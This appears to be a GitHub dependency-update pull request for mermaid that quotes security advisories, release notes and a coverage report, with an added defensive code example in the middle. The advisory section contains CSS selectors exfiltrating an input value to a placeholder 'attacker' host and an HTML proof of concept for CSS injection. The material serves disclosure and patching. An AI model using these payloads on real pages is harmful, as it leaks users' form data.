This repository was archived by the owner on Dec 5, 2024. It is now read-only.

chore(deps): update dependency mermaid to v9 [security] #635

Open · wants to merge 1 commit into master from renovate/npm-mermaid-vulnerability

Conversation

renovate[bot]

@renovate renovate bot commented Dec 10, 2021

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
| --- | --- | --- | --- | --- | --- |
| mermaid | ^8.10.2 -> ^9.0.0 | (age badge) | (adoption badge) | (passing badge) | (confidence badge) |

GitHub Vulnerability Alerts

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2021-43861

Impact

Malicious diagrams can contain JavaScript code that can be run on diagram readers' machines.

Patches

Users should upgrade to version 8.13.8.

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by brute-forcing the value attribute one character at a time. Whenever there is an actual match, an HTTP request will be made by the browser in order to "load" a background image, which lets the attacker know what the value of the character is.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables, leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  // Theme variables are interpolated verbatim into the stylesheet.
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }
  /* ... remainder of the stylesheet elided in the advisory snippet ... */
  `;
};

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list, but we encourage maintainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.


Release Notes

mermaid-js/mermaid (mermaid)

v9.1.2

Compare Source

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

Documentation

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

  • Removal of vulnerability (#2958) @knsv
  • Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

  • Commit types
  • Multiple branches in separate lanes
  • Theming

Other changes:

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.14.0

Compare Source

Release Notes

Main feature

  • Adding a new, more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#2654)

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.10

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.9

Compare Source

Release Notes

Changes to the functionality

Documentation changes

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

[v8.13.8](https://redirect.github.com/mermaid-js/mermaid/rele
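The advisory's Remediation ("ensure that user input is adequately escaped before embedding it in CSS blocks") and the v8.14.0 release note about the 'sandbox' security level describe two complementary defenses against the CSS injection in GHSL-2022-036. The following is an added example, not mermaid's own code from this PR or from the mermaid project: it places the advisory's raw-interpolation shape of getStyles beside an allowlist-validated variant that refuses the advisory's textColor payload, and wraps a rendered SVG in a sandboxed iframe via a base64 data: URL the way the release note describes. All function names, the regex grammars and the sample theme values are assumptions chosen for illustration.

```javascript
// Added example (not mermaid's code): two defensive layers against the CSS
// injection described in GHSL-2022-036. Function and constant names here are
// assumptions for illustration, not mermaid's API.

// Layer 1: allowlist grammars for the value kinds the advisory's getStyles
// snippet interpolates. A theme variable must match its grammar exactly, so
// the characters an injection needs (';', '{', '}') never reach the stylesheet.
const CSS_VALUE_PATTERNS = {
  // named colour, #rgb/#rrggbb/#rrggbbaa, or rgb()/rgba()/hsl()/hsla() with numeric args
  color: /^(?:[a-zA-Z]{1,32}|#[0-9a-fA-F]{3,8}|(?:rgb|hsl)a?\(\s*[\d.%]+(?:\s*,\s*[\d.%]+){2,3}\s*\))$/,
  // length with a unit, or one of a few keywords
  fontSize: /^(?:\d+(?:\.\d+)?(?:px|pt|em|rem|%)|small|medium|large)$/,
  // comma-separated family names, optionally double-quoted
  fontFamily: /^"?[A-Za-z0-9 \-]{1,64}"?(?:\s*,\s*"?[A-Za-z0-9 \-]{1,64}"?){0,7}$/,
};

// Returns the value unchanged when it matches the grammar for `kind`; throws otherwise.
function assertCssValue(kind, value) {
  const pattern = CSS_VALUE_PATTERNS[kind];
  if (!pattern) throw new Error(`unknown CSS value kind: ${kind}`);
  if (typeof value !== 'string' || !pattern.test(value)) {
    throw new Error(`rejected ${kind} value: ${JSON.stringify(value)}`);
  }
  return value;
}

// Vulnerable shape, mirroring the advisory's snippet: raw interpolation of
// theme variables into a template literal.
function getStylesUnsafe(options) {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }`;
}

// Hardened variant: every interpolated value is validated first.
function getStylesSafe(options) {
  return ` {
    font-family: ${assertCssValue('fontFamily', options.fontFamily)};
    font-size: ${assertCssValue('fontSize', options.fontSize)};
    fill: ${assertCssValue('color', options.textColor)}
  }`;
}

// Cheap detection check on the emitted fragment: the template opens exactly
// one rule block, so a second '{' means a selector was smuggled in.
function countRuleBlocks(css) {
  return (css.match(/{/g) || []).length;
}

// Layer 2: embed the rendered SVG through a sandboxed iframe with a base64
// data: URL, the mechanism the v8.14.0 'sandbox' security level describes.
// A stylesheet inside the frame cannot select elements of the embedding
// page, so an injected selector has nothing outside the diagram to hit.
// Returns markup as a string (Node's Buffer does the encoding; in a browser
// use btoa on the UTF-8 bytes instead).
function sandboxedIframeMarkup(svg) {
  const encoded = Buffer.from(svg, 'utf8').toString('base64');
  // An empty sandbox attribute enables every restriction: no scripts,
  // a unique origin, no form submission, no top-level navigation.
  return `<iframe sandbox="" src="data:image/svg+xml;base64,${encoded}"></iframe>`;
}

// Constructed inputs: the payload quoted in the advisory and a benign theme.
const INJECTED_TEXT_COLOR = 'green;} #target { background-color: crimson }';
const BENIGN_THEME = { fontFamily: 'trebuchet ms, verdana, arial', fontSize: '16px', textColor: 'green' };

function demo() {
  const hostile = { ...BENIGN_THEME, textColor: INJECTED_TEXT_COLOR };
  console.log('unsafe rule blocks with payload:', countRuleBlocks(getStylesUnsafe(hostile)));
  console.log('safe rule blocks, benign theme:', countRuleBlocks(getStylesSafe(BENIGN_THEME)));
  try {
    getStylesSafe(hostile);
  } catch (err) {
    console.log('safe variant refused payload:', err.message);
  }
  console.log(sandboxedIframeMarkup('<svg xmlns="http://www.w3.org/2000/svg"></svg>'));
}

demo();
```

The validator is an allowlist rather than an escape routine on purpose: CSS has no universally safe escaping for a value position, so the practical fix is to accept only the grammar a colour, length or font list can take. The iframe layer is independent of it and is the one to rely on when diagrams come from untrusted authors, since it also contains anything the validator's grammar might miss.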

@renovate renovate bot added the renovate label Dec 10, 2021
@codecov

codecov bot commented Dec 10, 2021

Codecov Report

Base: 84.55% // Head: 84.55% // No change to project coverage 👍

Coverage data is based on head (a9a66a2) compared to base (b27ba01).
Patch has no changes to coverable lines.

❗ Current head a9a66a2 differs from pull request most recent head f5fd4b0. Consider uploading reports for the commit f5fd4b0 to get more accurate results

Additional details and impacted files
@@           Coverage Diff           @@
##           master     #635   +/-   ##
=======================================
  Coverage   84.55%   84.55%           
=======================================
  Files          11       11           
  Lines         259      259           
  Branches       48       48           
=======================================
  Hits          219      219           
  Misses          6        6           
  Partials       34       34           


@renovate renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from 5f70498 to a9a66a2 Compare January 6, 2022 20:26
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 8.11.0 [security] chore(deps): update dependency mermaid to 8.13.8 [security] Jan 6, 2022
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 8.13.8 [security] chore(deps): update dependency mermaid to 9.1.2 [security] Sep 25, 2022
@renovate renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from a9a66a2 to f5fd4b0 Compare September 25, 2022 18:57
@renovate renovate bot changed the title chore(deps): update dependency mermaid to 9.1.2 [security] chore(deps): update dependency mermaid to v9 [security] Mar 24, 2023